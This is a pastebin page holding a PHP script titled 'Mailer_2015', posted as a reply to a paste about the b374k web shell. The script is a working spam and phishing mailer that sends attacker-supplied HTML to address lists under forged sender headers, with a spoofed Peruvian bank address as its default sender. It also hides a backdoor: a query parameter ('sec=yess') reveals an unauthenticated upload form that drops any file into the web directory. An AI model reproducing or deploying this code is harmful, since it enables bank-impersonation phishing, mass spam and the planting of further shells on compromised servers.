Re: Web Shell b374k r3c0d3d by x'1n7

From Unique Elephant, 2 Weeks ago, written in Plain Text, viewed 52 times. This paste is a reply to Web Shell b374k r3c0d3d by x'1n7 from x - view diff
URL http://paste.security-portal.cz/view/0ca61b0e Embed
Download Paste or View Raw
  1. <?php
  2. @set_time_limit(0);
  3. if(isset($_POST['Enoc']))
  4. {
  5.         $message = $_POST['html'];
  6.         $subject = $_POST['assunto'];
  7.         $de = $_POST['de'];
  8.         $nombre = $_POST['RealName'];
  9.         $ellos = $_POST['ellos'];
  10.  
  11.         $message = urlencode($message);
  12.         $message = ereg_replace("%5C%22", "%22", $message);
  13.         $message = urldecode($message);
  14.         $message = stripslashes($message);
  15.  
  16. }else{
  17.         $testa ="";
  18.         $message = "<html><body><h1>Aqui va tu letter</h1></body></html>";
  19.         $subject = $_SERVER["HTTP_HOST"];
  20.         $nombre = "BNenlinea";
  21.         $de = "BNenlinea@bn.com.pe";
  22.         $ellos = "carlos_rafael_br@hotmail.com";
  23. }
  24. ?>
  25. <html>
  26. <head>
  27. <title>Mailer_2015</title></head>
  28. </head>
  29. <body style="font-family: Arial; font-size: 11px">
  30. <center>
  31. <form action="" method="post" enctype="multipart/form-data" name="form1">
  32. <br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal">
  33. <tr>
  34. <td>
  35. <table border="0" bgcolor="#FFFFFF" width="95%">
  36. <tr>
  37. <td>
  38. <table border="0" width="100%">
  39. <tr>
  40. <td width="359">Email:   <input name="de" type="text" class="form" id="de" size="30" value="<? print $de; ?>"></td>
  41. <td>Nombre:   <input name="RealName" type="text" class="form" id="RealName" size="30" value="<? print $nombre; ?>"></td>
  42. </tr>
  43. </table>
  44. </td>
  45. </tr>
  46. <tr>
  47. <td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="<? print $subject; ?>"></td>
  48. </tr>
  49. <tr>
  50. <td height="18" bgcolor="#C0C0C0"></td>
  51. </tr>
  52. <tr>
  53. <td>
  54. <table border="0" width="100%">
  55. <tr>
  56. <td>
  57. <textarea name="html" cols="66" rows="10" id="html"><? print $message; ?></textarea></td>
  58. <td><textarea rows="10" name="ellos" cols="35"><? print $ellos; ?></textarea></td>
  59. </tr>
  60. </table>
  61. </td>
  62. </tr>
  63. <tr>
  64. <td><center>
  65. <br><input type="submit" name="Enoc" value="Enviar"></center><br>
  66. <?php
  67. if($_GET['sec']=='yess')
  68. {
  69.         echo '<form action="" method="post" enctype="multipart/form-data">
  70.         <input name="archivo" type="file" size="35" />
  71.         <input name="enviar" type="submit" value="Upload File" />
  72.         <input name="action" type="hidden" value="upload" />    
  73.         </form>';
  74.  
  75.         $status = "";
  76.         if ($_POST["action"] == "upload")
  77.         {
  78.                 $tamano = $_FILES["archivo"]['size'];
  79.                 $tipo = $_FILES["archivo"]['type'];
  80.                 $archivo = $_FILES["archivo"]['name'];
  81.          
  82.                 if ($archivo != "")
  83.                 {
  84.                         if (copy($_FILES['archivo']['tmp_name'],"./".$archivo))
  85.                         {
  86.                                 $status = "Archivo subido: <b>".$archivo."</b>";
  87.                         }else{
  88.                                 $status = "Error al subir el archivo";
  89.                         }
  90.                 } else {
  91.                         $status = "Error al subir archivo";
  92.                 }
  93.                 echo $status;
  94.         }
  95. }
  96. if(!isset($_POST['Enoc'])){
  97.         exit;
  98. }
  99.  
  100. if(!isset($_GET['c']))
  101. {
  102.         $email = explode("n", $ellos);
  103. }else{
  104.         $email = explode(",", $ellos);
  105. }
  106. $son = count($email);
  107.  
  108. if(!isset($_GET['e'])){
  109.         $header = "MIME-Version: 1.0n";
  110.         $header .= "Content-type: text/html; charset=iso-8859-1n";
  111.         $header .= "From: ".$nombre . " <" . $de . ">n";
  112.         $header .= "Reply-To: " . $de . "n";
  113.         $header .= "X-Priority: 3n";
  114.         $header .= "X-MSMail-Priority: Normaln";
  115.         $header .= "X-Mailer: ".$_SERVER["HTTP_HOST"];
  116. }else{
  117.         $header ='MIME-Version: 1.0' . "rn";
  118.         $header .= 'Content-type: text/html' . "rn";
  119.         $header .="From: ".$de;
  120. }
  121. $i = 0;
  122. $voy=1;
  123. while($email[$i])
  124. {
  125.         if(isset($_GET['time']) && isset($_GET['cant'])){
  126.                 if(fmod($i,$_GET['cant'])==0 && $i>0){
  127.                         print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>n";
  128.                         flush();
  129.                         @mail($_GET['notf'], $subject, $message, $header);
  130.                         sleep($_GET['time']);
  131.                 }
  132.         }
  133.         $mail = str_replace(array("n","rn"),'',$email[$i]);
  134.         $message1 = ereg_replace("%email%", $mail, $message);
  135.         if(@mail($mail, $subject, $message1, $header))
  136.         {
  137.                 print "<font color=green face=verdana size=1>    ".$voy." de ".$son."  ;-) ".trim($mail)."  Spam pam pam pa la mujeres</font><br>n";
  138.                 flush();
  139.         }
  140.         else
  141.         {
  142.                 print "<font color=red face=verdana size=1>    ".$voy." de ".$son.":-( ".trim($mail)."  Error te digo altoquesein!!</font><br>n";
  143.                 flush();
  144.         }                                                            
  145.         $i++;
  146.         $voy++;
  147. }
  148. echo "<script> alert('---Ya envie a todos---'); </script>";
  149. ?>
  150. </td>
  151. </tr>
  152. </table>
  153. </td>
  154. </tr>
  155. </table>
  156. </body>
  157. </form>
  158. </center>
  159. </html>

Reply to "Re: Web Shell b374k r3c0d3d by x'1n7"

Here you can reply to the paste above